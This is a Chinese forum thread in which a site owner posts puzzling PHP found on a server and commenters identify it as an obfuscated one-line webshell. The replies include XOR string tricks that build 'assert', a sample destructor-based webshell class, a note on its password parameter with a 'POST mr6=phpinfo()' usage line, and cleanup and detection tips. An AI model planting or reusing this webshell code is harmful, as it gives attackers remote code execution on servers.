

不知道写的是什么,感觉这代码也写得太烂了,一点都不规范啊
1 CloudMx 2019 年 10 月 30 日 变形的一句话: php > echo '?'^"\x5e"; a php > echo 'y'^"\xa"; s php > echo '<'^"\x4f"; s php > echo 'i'^"\xc"; e php > echo ':'^"\x48"; r php > echo 't'^"\x0"; t |
2 daxiaolian PRO 正常开发没人这么写代码,所以服务器上看到乱七八糟的代码都是被黑了。 |
3 ShangAliyun 2019 年 10 月 30 日 不知道是不是一句话木马类的东西,用来检测网站是否有能注入文件的漏洞的 |
4 tomychen 2019 年 10 月 30 日 变形免杀 webshell 兄弟,你的机器被 shell 了 |
5 shench 2019 年 10 月 30 日 这显然是木马啊! |
6 luckyrayyy 2019 年 10 月 30 日 谁能给解释下啥意思.. |
7 GG668v26Fd55CP5W 2019 年 10 月 30 日 via iPhone 这就是木马 |
8 golden0125 2019 年 10 月 30 日 恭喜你,中马了 |
9 Dogergo 2019 年 10 月 30 日 是个木马 ```php class EPLF { function __destruct() { return @assert("$this->RU"); } } $a = new EPLF(); @$a->RU = mkdir('/d/shellattack',0777,true); ``` 类似这样,可以通过远程请求该文件执行一些非法操作,执行的操作通过 post/get 提交的变量来处理。 |
10 sauren 2019 年 10 月 30 日 一个 php 一句话木马。mr6 是密码。存在 id 参数时 base64 解密,不存在 id 时直接执行。usage:POST mr6=phpinfo() 将会执行 phpinfo。 |
11 ahsjs 2019 年 10 月 30 日 析构方法过狗么。 |
12 eason1874 2019 年 10 月 30 日 assert,效果类似 eval。就是在析构的时候把 RU 变量作为代码字符串传给 assert 执行。 |
13 laoyur 2019 年 10 月 30 日 莫名喜感 |
14 JingNi 2019 年 10 月 30 日 构造函数的字符串连接,是专门绕过 waf 的一句话木马,直接能读写你网站根目录的文件,建议楼主备份数据库,检查网站访问日志还有运行环境,找可疑的访问用户。再审计上线原源码的图片上传点还有其他文件包含点吧。 |
15 Mithril 2019 年 10 月 30 日 被黑了居然还嫌人代码不规范 被抢了嫌劫匪不够帅? |
17 leadfast 2019 年 10 月 30 日 via iPhone 通常我会觉得这写的太牛批了,狗头保命 |
18 wzhndd2 2019 年 10 月 30 日 我也遇到过这种情况,但我是个懒人,我如何能避免自己的服务器免于这种情况呢 |
22 loginv2 2019 年 10 月 30 日 不装 PHP 就没事了 |
23 care 2019 年 10 月 30 日 via iPhone 楼主是怎么发现服务器上多了个文件的 |
24 kcer 2019 年 10 月 30 日 哈哈哈哈~中奖了~ |
25 frozenway OP @care find /data/www -type f -name "*.php" -mtime -1 查找最近修改过的 php 文件 |
26 NakeSnail 2019 年 10 月 30 日 能这么写的在很多知识上比一般 PHP 深入多了,差在哪里。。规范? |
27 misskiki 2019 年 11 月 1 日 兄弟不用怀疑 你已经中毒了 |